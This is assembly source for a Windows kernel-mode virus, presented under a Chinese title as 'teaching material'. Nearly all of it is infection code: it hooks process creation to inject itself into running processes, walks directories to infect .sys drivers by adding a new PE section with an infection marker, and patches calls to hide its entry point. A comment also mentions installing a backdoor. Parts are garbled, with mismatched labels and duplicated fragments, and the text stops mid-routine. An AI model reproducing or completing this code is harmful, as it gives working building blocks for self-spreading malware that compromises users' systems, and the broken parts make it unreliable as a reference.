教材性质的病毒代码(ASM)

 VIRUS CODE 
BY VXK/C.V.C

.586
.modelflat
Option Casemap :None
includeuseful.inc
include win32.inc
includemz.inc
includepe.inc
.Data


unicode_stringstruc
us_lengthdd?;length of the string
us_pstringdd?;ptr to string
unicode_stringends


pathstruc
p_pathdwMAX_PATH dup (?);maximal length of path in unicode
pathends


object_attributesstruc
oa_lengthdd?;length of structure
oa_rootdirdd?
oa_objectnamedd?;name of object
oa_attribzdd?;attributez of the object
oa_secdescdd?
oa_secqosdd?
object_attributesends


pio_statusstruc;status structure
ps_ntstatusdd?
ps_infodd?
pio_statusends

.code
VStart:
pushad
call K_GetDelta
K_GetDelta:
pop esi
lea esi,[esi-offset K_Getdelta]
Call GetUserPEB
jz Ring3Code
@SEH_SetupFrame ;setup SEH frame
call DisableWriteProtect
mov [esi+orlart],eax
push 80400000h
Call GetKernelBase
cmp eax,1
jnz ring_proc
@SEH_RemoveFrame
push [esi+orlart]
call EnableWriteProtect
jmp ret_host
ring0_proc:
mov [esi+offset NtKernel],eax
Call GetAllKapiz;
jmp main_ring0
ring0_main:
Call InstallOurListener
Call Ring0InfectFile
;Call BackDoorInstall,might be loaded into code of AIDS II
push [esi+orlart]
call EnableWriteProtect
jmp ret_host
InstallOurListener:
push 0
lea eax ,[esi+offset ProcFilter]
push eax
Call [esi+_PsSetCreateProcessNotifyRoutine]
ret
call_table = $
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; ProcFilter
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
ProcFilter proc dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL; BOOLEAN
pushad
lea eax,[esi+offset Ring3Code]
lea ebx,[esi+offset VStart]
mov ecx,(eax-ebx)
push ecx
push V_len
push ebx
push dwProcessId
Call MemInfect
push ecx
push V_len
push ebx
push dwParentId
call MemInfect
popad
mov eax,bCreate
ret
ProcFilter Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
GetUserPEB procnear
assume fs:nothing
push ebx
mov ebx, dword ptr fs:[124h]
mov eax, dword ptr [ebx+134h]; gimme KTRAP_FRAME
; no ktrap_frame if called from kernel mode
; (from non user mode thread)
test eax, eax
jz GetUserPEB_End

mov eax, dword ptr [ebx+44h]
mov eax, dword ptr [eax+1b0h]; peb for non user mode threadz null too
test eax, eax
GetUserPEB_end:
pop ebx
retn
GetUserPEB endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EVL_Code
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

EVL_codeequ $
db 0b8h
retaddrZ dd 0
call [eax]
db 0b8h
Hook dd 0
jmp dword ptr [eax]
SIZEOF_EVLequ $-EVL_code
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MemInfect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
MemInfect proc dwPId:DWORD, dwAddr:DWORD, dwSize:DWORD, deltaR3:DWORD
local oldArr:DWORD
local base_address:dword
local pEpr:DWORD
local lpPEB:DWORD

popad
push esp
push dwPId
call [esi+_PsLookupProcessByProcessId]
pop pEpr; -> EPROCESS
.if eax != STATUS_SUCCESS
jmp MemInfect_End
.endif
push pEpr
call [esi+ _KeAttachProcess]
call DisableWriteProtect
mov oldArr,eax
call GetUserPEB
jz MemInfect_End:
MemInfect_Ring3:
and base_address, 0
push PAGE_READWRITE
push MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE
lea eax, allocation_size
mov allocation_size, (dwSize+1024)
push eax
lea eax, base_address
push 0
push eax
push -1
call [esi+_NtAllocateVirtualMemory]
test eax, eax
jnz MemInfect_End
mov edx, base_address
mov edi, edx
push edi
push esi
mov esi, dwAddr; copy the to user-mode
push dwSize
pop ecx
rep movsb
pop esi
pop edi
lea eax,[esi+offset retaddrZ]
mov [eax],base_address
add [eax],deltaR3
mov eax,pEpr
mov eax,[eax+1b0h]
mov eax,[eax+08h]
push esi
mov esi,eax
push "KXV"
push "KXV"
lea eax,[esi+offset Hook]
push eax
push 0
push 0
lea eax,[esi+offset EVL_CODE]
push eax
push esi
Call Infect
pop esi
;hmap:dword,dwaddrstart:dword,dwsize:dword,typef:dword,fsize:dword,retaddr:dword,sign1:dword
MemInfect_End:
leave
push oldArr
call EnableWriteProtect
call [esi+_KeDetachProcess]
push pEpr
call [esi+_ObfDereferenceObject]
RL_End:
popad
ret
MemInfect Enpd
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Ring0InfectFile
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Ring0InfectFile proc
Call InfectNt
ret
Ring0InfectFile Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetAllKapiz
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetAllKapiz proc
pushad
push esi
mov ecx,19h
mov ebx, [esi+offset NtKernel]
lea edx, [esi+offset Kapiz_name_addr]
lea ebp, [esi+offset Kapiz_size]
lea edi,[esi+offset Kapiz_addr]
KApiz_Do:
push [ ebp ]
push [ edx ] + esi
push ebx
Call NTGetProcAddr
push ebx
mov ebx, [ edi ] + esi
mov [ ebx ],eax
pop ebx
add edi,4
add ebp,4
add edx,4
dec ecx
Check_ww:
xor eax,eax
cmp ecx,eax
jnz Kapiz_Do
pop esi
popad
ret
GetAllKapiz endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; MmIsAddressValid
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

MmIsAddressValid proc lAddress:dword
;用于判断一个地址是否存在....
pushad
mov ecx,lAddress
mov eax, ecx
shr eax, 14h
mov edx, 0FFCh
and eax, edx ;offset in PageDirectoryEntry
sub eax, 3FD00000h;add eax,0c0300000h
mov eax, [eax]
test al, 1
jz AddressInValid
test al, al
js AddressValid
shr ecx, 0Ah
and ecx, 3FFFFCh;offset in PageTableEntry
sub ecx, 40000000h;add ecx,0c0000000h
mov eax, [ecx]
test al, 1
jz AddressInValid
test al, al
js @f
AddressValid:
popad
mov eax,1
ret 04h
AddressInValid:
popad
xor eax,eax
ret 04h
@@:
and ecx, edx
mov eax, [ecx-3FD00000h]
and ax, 81h
cmp al, 81h
jnz AddressValid
jmp AddressInValid
MmIsAddressValid endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetKernelBase
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
GetKernelBase proc uses esi edi dwKernelRet:DWORD
LOCAL dwReturn: DWORD
push esi
push edi
mov dwReturn,1
mov edi, dwKernelRet ; edi = 堆栈顶
repp:
push edi
call MmIsAddressValid
cmp eax,1
jnz adda
cmp word ptr [edi],IMAGE_DOS_SIGNATURE ; 等于“MZ”吗?
jz getp
getp:
mov esi, edi ; Yes, next...
add esi, [esi + IMAGE_DOS_HEADER.e_lfanew] ; 就是 esi + 3ch
push esi
call MmIsAddressValid
cmp eax,1
jnz adda
cmp word ptr [esi],IMAGE_NT_SIGNATURE ; 等于“PE”吗?
jz find
find:
mov dwReturn, edi ; Yes, we got it.
jmp endpp
adda:
add edi,001000h
cmp edi,80501000h ; 基地址一般不可能大于80500000h
jz end
jmp repp
endpp:
mov eax, dwReturn
pop edi
pop esi
add esp,4
ret 04h
GetKernelBase endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; strcmpi
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
strcmpi proc lpAddress:dword,lpName:dword,dsize:dword
pushad
cld
xor eax,eax
movedi,lpAddress
mov esi,lpName
mov ecx,dsize
rep cmpsb
jne not_match
jmp match
not_match:
popad
mov eax,1
ret 0Ch
match:
popad
xor eax,eax
ret 0Ch
strcmpi endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NtGetProcAddr
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
NTGetProcAddr proc hModule:dword,lpfunName:dword,size_fun:dword
Local i:dword
Local pdwfuncAddr:dword
Local pszName:dword
Local pDosh:Dword
Local pNth:dword
Local pDataDir:Dword
Local pExdir:dword
Local retaddr:dword
StartGet:
pushad
mov retaddr,0
push hmodule
call MmIsAddressValid
cmp eax,1
jnz er_exit
push lpfunName
call MmIsAddressValid
cmp eax,1
jnz er_exit
mov ebx,hModule
assume ebx : ptr IMAGE_DOS_HEADER
movedx,dword ptr [ebx].e_magic
cmp edx,IMAGE_DOS_SIGNATURE
jnz er_exit
movedx,ebx
addebx,dword ptr [edx].e_lfanew
push ebx
call MmIsAddressValid
cmp eax,1
jnz er_exit
mov edx,ebx
assumeebx : nothing
mov ebx,edx
assume ebx : ptr IMAGE_NT_HEADERS32
movedx,dword ptr [ebx].Signature
cmp edx,IMAGE_NT_SIGNATURE
jnz er_exit
mov edx,dword ptr [ebx].OptionalHeader.DataDirectory
add edx,IMAGE_DIRECTORY_ENTRY_EXPORT
assume ebx : nothing
mov ebx,edx
assume ebx : ptr IMAGE_DATA_DIRECTORY
push ebx
call MmIsAddressValid
cmp eax,1
jnz er_exit
mov edx,dword ptr [ebx].VirtualAddress
push edx
Call MmIsAddressValid
cmpeax,1
jnzer_exit
xor eax,eax
cmpedx,eax
jz er_exit
movedx,dword ptr [ebx].VirtualAddress
add edx,hModule
push edx
call MmIsAddressValid
cmp eax,1
jnz er_exit
assume ebx : nothing
movebx,edx
assumeebx : ptr IMAGE_EXPORT_DIRECTORY
xor ecx,ecx
;mov ecx,dword ptr [ebx].NumberOfNames
mov edx,dword ptr [ebx].AddressOfNames
addedx,hModule
Loop_pp:
push edx
call MmIsAddressValid
cmp eax,1
jnz addx
mov eax,edx
add eax,hModule
push eax
call MmIsAddressValid
cmp eax,1
jnz addx
push size_fun
push lpfunName
mov eax,edx
add eax,hModule
push eax
callstrcmpi
cmp eax,1
jz addx
jmp getIt
addx:
incedx
incecx
mov eax,dword ptr [ebx].NumberOfNames
inc eax
cmpecx,eax
jnz Loop_pp
Check_Num:
cmp ecx,dword ptr [ebx].NumberOfNames
jg er_exit
GetIt:
mov i,ecx
mov ecx,word ptr [ebx].AddressOfNameOrdinals
add ecx,hModule
push ecx
callMmIsAddressValid
cmp eax,1
jnz er_exit
mov edx,dword ptr [ebx].AddressOfFunctions
addedx,hModule
push edx
callMmIsAddressValid
cmp eax,1
jnz er_exit
mov ebx,edx
mov eax,ecx
mov ecx,i
add eax,ecx * 2
add ebx,eax
add ebx,hModule
Exit:
mov retaddr,ebx
popad
mov eax,retaddr
add esp,20h
ret 0ch
er_exit:
popad
xor eax,eax
mov eax,1
add esp,20h
ret 0ch
NTGetProcAddr Endp
call_table_end = $
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; HooK2e
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
HooK2e proc
pushad
lea ebx,[esi+offset Int_2e_NewHandler]
push ebx
push 2eh
call HookInt
mov [esi+pOrgIntHandler],eax
popad
ret
Hook2e endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; InfectNt
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
InfectNT proc
localuni_string:unicode_string
localu_string:path
localobject_attr:object_attributes
localio_status:pio_status
localdHandle:DWORD
localWFD:WIN32_FIND_DATA
local minidelta: dword
local hfile:dword
local hMapping:dword
local pMapping:dword
local isnt:dword
local fsize:dword
local pNewSection:dword
local pNTHeader:dword
localobject_attr:object_attributes
localio_status:pio_status
localfHandle:DWORD
localsHandle:DWORD
localsOffset:DWORD
localbytez:DWORD
localsOffset2:QWORD
local info:FILE_STANDARD_INformATION

pushad
mov minidelta,esi
mov[uni_string.us_length],80008h;length of the string
leaedi,[u_string]
mov[uni_string.us_pstring],edi;set the pointer
call@qm
dw'/','?','?','/';initial string of the object
@qm:popesi
movsd
movsd;save it
mov esi,fs:[18h]
mov esi,[esi+30h]
mov esi,[esi+10h]
add esi,24h
mov esi,[esi+4];ESI = current folder
xorecx,ecx
l_copy:lodsw
incecx
stosw;append it
testeax,eax
jnel_copy
dececx

leaedi,[uni_string]
shlecx,1
addcx,[edi]
movax,cx
shlecx,16
movcx,ax
mov[edi],ecx;save the new length

xorecx,ecx;initialize the structure ...
leaeax,[uni_string]
leaedi,[object_attr]
mov[edi.oa_length],24
and[edi.oa_rootdir],ecx
mov[edi.oa_objectname],eax
mov[edi.oa_attribz],40h
and[edi.oa_secdesc],ecx
and[edi.oa_secqos],ecx

push4021h
push3h
leaeax,[io_status]
pusheax
pushedi
push100001h
leaebx,[dHandle]
pushebx
callNtOpenFile;open the current folder
movebx,[ebx]

xorecx,ecx
f_loop:pushecx

xoreax,eax
pusheax
call@p1
dd0A000Ah;length of the string
dd?;ptr to string
@p1:popesi
call@exe
dw'<','.','s','y','s';string
@exe:popdword ptr [esi+4];save the ptr
jecxz@1st
xoresi,esi
@1st:pushesi
push1
push3
pushMAX_PATH*2
leaedx,[WFD]
pushedx
leaedx,[io_status]
pushedx
pusheax
pusheax
pusheax
pushebx
mov eax,minidelta
Call Dword ptr [eax+_ZweryDirectoryFile]
;addesp,4*11;correct the stack

popecx
testeax,eax
jnee_loop;quit if no more file

pushdword ptr [uni_string];save the length

leaesi,[WFD];WIN32_FIND_DATA structure
leaedi,[uni_string];the filename
callinfect_file;infect the file

popdword ptr [uni_string];restore the length
incecx
jmpf_loop;find next file

e_loop:pushebx
callNtClose;close the directory
popad
add esp,size unicode_string
add esp,size path
add esp,size object_attributes
add esp,size pio_status
add esp,size WIN32_FIND_DATA
add esp,4
ret
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
NtClose:
mov eax,minidelta
Call dword ptr [eax+_ZwClose];close the handle
ret;4

NtOpenfile:
mov eax,minidelta
Call dword ptr [eax+_ZwOpenFile];open the object
ret

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
pushad
movzxedx,word ptr [edi]
addedx,[edi+4]
pushedi
movedi,edx;EDI - end of string

movecx,[esi+3Ch];size of filename
pushecx
leaesi,[esi+5Eh];filename
repmovsb;copy the string
popecx
popedi

addcx,[edi]
movax,cx
shlecx,16
movcx,ax
mov[edi],ecx;size of path+filename
xchgeax,edi

xorecx,ecx;initialize the structure...
leaedi,[object_attr]
mov[edi.oa_length],24
and[edi.oa_rootdir],ecx
mov[edi.oa_objectname],eax
mov[edi.oa_attribz],40h
and[edi.oa_secdesc],ecx
and[edi.oa_secqos],ecx

push4060h
push3h
leaecx,[io_status]
pushecx
pushedi
push100007h
leaebx,[fHandle]
pushebx
callNtOpenFile;open the file
testeax,eax
jneif_end
movebx,[ebx]

xoreax,eax
pushebx
push8000000h
pushPAGE_READWRITE
pusheax
pusheax
push0F0007h
leaebx,[sHandle]
pushebx
mov eax,minidelta
Call dword ptr [eax+_ZwCreateSection]
;addesp,4*7;correct stack
testeax,eax
jneif_end2
movebx,[ebx]

leaedx,[bytez];initialize some variablez
xoreax,eax
and[sOffset],eax
and[edx],eax
anddword ptr [sOffset2],eax
anddword ptr [sOffset2+4],eax

push4
pusheax
push1
pushedx
leaedx,[sOffset2]
pushedx
pusheax
pusheax
leaesi,[sOffset]
pushesi
push-1
pushebx
mov eax ,minidelta
Call dword ptr [eax+_ZwMapViewOfSection]
;addesp,4*10
testeax,eax
jneif_end3
movebx,[esi]
mov pMapping,esi;EBX = start of memory-mapped file
assume esi:ptr IMAGE_DOS_HEADER
cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
jnz IF_end4
cmp [esi].e_lfarlc,040h
jnz IF_end4
Epo_main:
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?
jnz if_end4
xor eax,eax
cmp [esi].OptionalHeader.Subsystem,8
jnz set_ring3_file
jmp set_ring0_file
set_ring3_file:
;cmp [esi].OptionalHeader.Subsystem,2
jmp if_end4
set_ring0_file:
nop
nop
jmp MakeCheck
MakeCheck:
push esi
lea ebx,[esi].OptionalHeader.CheckSum
mov ecx,[ebx]
jecxz no_checksum
mov dword ptr [ebx],0 ;zero the checksum
;NtQueryInformationFile(
;IN HANDLE FileHandle,
;OUT PIO_STATUS_BLOCK IoStatusBlock,
;OUT PVOID FileInformation,
;IN ULONG Length,
;IN FILE_INformATION_CLASS FileInformationClass)
mov eax,FILE_INformATION_CLASS.FileStandardInformation
push eax
push sizeof FILE_STANDARD_INformATION
lea eax,info
push eax
lea eax,[io_status]
push eax
lea eax,[fHandle]
push eax
mov eax,minidelta
Call [eax+_NtQueryInformationFile]
;add esp,14h
;ZwQueryInformationFile, hFile, addr iosb, addr fsi, sizeof fsi, FileStandardInformation
mov fsize,[info].AllocationSize
;mov eax, [info].EndOfFile.LowPart
;inc eax
;mov fsize,eax
mov ecx,fsize;the file size
add ecx,offset VEND - offset Vstart;the file size after infect
push ecx
lea eax,[fHandle]
push eax
Call CheckSumFile
pop esi
lea ebx,[esi].OptionalHeader.CheckSum
mov dword ptr [ebx],eax
no_checksum:
cmp word ptr [esi+1ah],"KXV" ;检查感染标志
jz if_end4
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,[pMapping]
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja if_end4

;*****************************************
;空间允许, ^0^,edi指向新节
;*****************************************

inc [esi].FileHeader.NumberOfSections

assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],'suedomsa.' ;Name::Asmodeus-->某个语言的恶魔

push offset VEnd - offset VStart
pop [edi].Misc.VirtualSize ;VirtualSize

push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;VirtualAddress

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData

lea eax,[edi-28h+14h] ;prev PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;prev SizeOfRawData
add eax,[ecx]
mov [edi].PointerToRawData,eax ;PointerToRawData
mov [edi].Characteristics,0E0000020h ;可读可写可执行


;***************************************************************
;更新SizeOfImage,使新节可以正确加载并首先执行
;***************************************************************

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov word ptr [esi+1ah],"KXV" ;写入感染标志

mov pNTHeader,esi ;esi -> IMAGE_NT_HEADER
mov ebx,edi
Common_set:
mov pNewSection,ebx ; edi -> new Section
pushad
mov edi,[ebx].PointerToRawData
add edi,pMapping
lea esi,[esi+offset VStart]
mov ecx,((VEND-VStart)+3)/4
rep movsd
popad
xor ebx,ebx
call SimpleEPO

if_end4:
push [pMapping]
pop edx
pushebx
push-1
mov eax,minidelta
Call dword ptr [eax+_ZwUnmapViewOfSection]
;addesp,4*2
if_end3:
push[sHandle]
callNtClose;close the section
if_end2:
push[fHandle]
callNtClose;close the file
if_end:
popad
add esp,4*13
add esp,size object_attributes
add esp,size pio_status
add esp,size FILE_STANDARD_INformATION
ret
;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO:
pushad
mov edx , [pNTHeader]
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , [pMapping] ;Now edi = .text 的在文件中的偏移

@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
jnz @SearchE8
inc ebx ;纪录是第几个Jmp/call
cmp ebx,20h ;如果是第32个,那么开始工作....避免感染Ntoskrnl时,系统初始化失败...
jnz @SearchE8

PatchCALLandCopyJMP:
mov eax , [edx].VirtualAddress ;.text VirtualAddress
add eax , edi
sub eax , [pMapping]
sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX
add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)
mov edx , pNewSection
mov edx , [edx].VirtualAddress
xchg eax , edx
sub eax , edx ;get new XXXXXXXX
stosd
push eax
mov eax,minidelta
mov edi , [eax+offset Ret2ApiCall] ;write YYYYYYYY
pop eax
lodsd
stosd
popad
ret
InfectNT Endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Infect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Infect proc hmap:dword,dwaddrstart:dword,dwsize:dword,typef:dword,
fsize:dword,retaddr:dword,sign:dword,sign2:dword
local hMapping:dword
local pMapping:dword
local pNewSection:dword
local pNTHeader:dword
local cnt:dword
infect_main:
pushad
mov esi,hmap
mov eax,typef
cmp eax,1
jnz epo_infect
common_infect:
movebx,[esi];EBX = start of memory-mapped file
movesi,[ebx.MZ_lfanew]
addesi,ebx
moveax,[esi]
addeax,-IMAGE_NT_SIGNATURE
jneif_end;must be PE file
;discard not_executable and system filez
cmpword ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jneif_end
movax,[esi.NT_FileHeader.FH_Characteristics]
;test ax,system
;jne if_end
;testax,IMAGE_FILE_EXECUTABLE_IMAGE
;jneif_end
;testax,IMAGE_FILE_DLL
;jneif_end
;testax,IMAGE_FILE_SYSTEM
;jneif_end
;moval,byte ptr [esi.NT_FileHeader.OH_Subsystem]
;testal,subsy
;jneif_end
cmp word ptr [esi+1ah],sign1 ;检查感染标志
jz if_end
;call MakeCheck
jmp infect_comm
;MakeCheck:
;push esi
; lea ebx,[esi].OptionalHeader.CheckSum
; mov ecx,[ebx]
;mov dword ptr [ebx],0 ;zero the checksum
; mov ecx,fsize;the file size
; add ecx,dwsize;the file size after infect
;push ecx
; lea eax,[fHandle]
; push eax
;; Call CheckSumFile
; pop esi
; lea ebx,[esi].OptionalHeader.CheckSum
; mov dword ptr [ebx],eax
;ret
infect_comm:
movzxeax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
deceax
testeax,eax
jeif_end
imuleax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzxedx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
leaedi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
addedi,esi
leaedx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
moveax,[edx]
testeax,eax
jeif_end
cmpeax,[edi.SH_VirtualAddress]
jneif_end
cmp[edi.SH_SizeOfRawData],dwsize
jbAddSection;is it large enough?
pushad
xoreax,eax
movedi,edx
stosd
stosd
popad;erase relocs record

;align the section size
moveax,dwsize
cmpeax,[edi.SH_VirtualSize]
jbo_vs
movecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq
divecx
testedx,edx
jeo_al
inceax
o_al:mulecx
mov[edi.SH_VirtualSize],eax

o_vs:
pushdword ptr [retaddr]
moveax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
pushdword ptr [edi.SH_VirtualAddress]
popdword ptr [esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov[retaddr],eax
moveax,[esi.NT_OptionalHeader.OH_ImageBase]
add[retaddr],eax
;set saved_entrypoint variable
pushad
movedi,[edi.SH_PointerToRawData]
addedi,ebx
leaesi,dwaddrstart
movecx,(dwsize+3)/4
repmovsd;overwrite relocs by virus body
popad
popdword ptr [retaddr]
;restore used variablez
ordword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
jmp if_end
AddSection:
;if not enough room for us add an large enough section to it
inc [esi].NT_FileHeader.FH_NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr [edi],sign2
push [esi].NT_OptionalHeader.OH_SizeOfImage
pop [edi].SH_VirtualAddress
mov eax,dwsize
mov [edi].SH_VirtualSize,eax
mov ecx,[esi].NT_OptionalHeader.OH_FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SH_SizeOfRawData,eax
lea eax,[edi-28h+14h] ;PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].SH_PointerToRawData,eax
mov [edi].SH_Characteristics,0E0000020h ;set it can run and read write
mov eax,[edi].SH_VirtualSize
mov ecx,[esi].NT_OptionalHeader.OH_SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].NT_OptionalHeader.OH_SizeOfImage
mov [esi].NT_OptionalHeader.OH_SizeOfImage,eax
jmp o_vs
epo_infect:
movebx,[esi]
mov pMapping,esi;EBX = start of memory-mapped file
assume esi:ptr IMAGE_DOS_HEADER
cmp [esi].e_magic,IMAGE_DOS_SIGNATURE
jnz IF_end
cmp [esi].e_lfarlc,040h
jnz IF_end
Epo_main:
add esi,[esi].e_lfanew
assume esi:ptr IMAGE_NT_HEADERS
cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗?
jnz if_end4
;xor eax,eax
;cmp [esi].OptionalHeader.Subsystem,subsy
;jne if_end
;call MakeCheck
no_checksum:
cmp dword ptr [esi+1ah],sign1 ;检查感染标志
jz if_end
mov dword ptr [esi+1ah],sign1
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,sizeof IMAGE_SECTION_HEADER
mul ecx
add eax,sizeof IMAGE_NT_HEADERS
add eax,esi
mov edi,eax
add eax,sizeof IMAGE_SECTION_HEADER
sub eax,[pMapping]
cmp eax,[esi].OptionalHeader.SizeOfHeaders
ja if_end

;*****************************************
;空间允许, ^0^,edi指向新节
;*****************************************

inc [esi].FileHeader.NumberOfSections

assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],sign2

push dwsize
pop [edi].Misc.VirtualSize ;VirtualSize

push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;VirtualAddress

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData

lea eax,[edi-28h+14h] ;prev PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;prev SizeOfRawData
add eax,[ecx]
mov [edi].PointerToRawData,eax ;PointerToRawData
mov [edi].Characteristics,0E0000020h ;可读可写可执行


;***************************************************************
;更新SizeOfImage,使新节可以正确加载并首先执行
;***************************************************************

mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov word ptr [esi+1ah],sign1 ;写入感染标志

mov pNTHeader,esi ;esi -> IMAGE_NT_HEADER
mov ebx,edi
Common_set:
mov pNewSection,ebx ; edi -> new Section
pushad
mov edi,[ebx].PointerToRawData
add edi,hmap
mov esi,dwaddrstart
mov ecx,(dwsize+3)/4
rep movsd
popad
xor ebx,ebx
call SimpleEPO
if_end:
popad
add esp,34h
ret 14h

;---------------------------------StartEPO------------------------------
;入口参数: pNewSection : 新添加节(病毒节)的指针
; pNTHeader : 文件IMAGE_NT_HEADER的指针
; pMapping : 文件指针
;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.
;--------------------------------------------------------------------------
SimpleEPO:
pushad
;call RandNumMain
mov cnt,30h
xor ebx,ebx
mov edx , [pNTHeader]
add edx , sizeof IMAGE_NT_HEADERS
assume edx : ptr IMAGE_SECTION_HEADER
mov ecx , [edx].SizeOfRawData
mov edi , [edx].PointerToRawData
add edi , [pMapping] ;Now edi = .text 的在文件中的偏移

@SearchE8:
mov al , 0e8h
repne scasb ;search for call xxxxxxxx
mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.
lodsd ;search call relative
add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]
lodsw
cmp ax , 025ffh ;esi - > YYYYYYYY
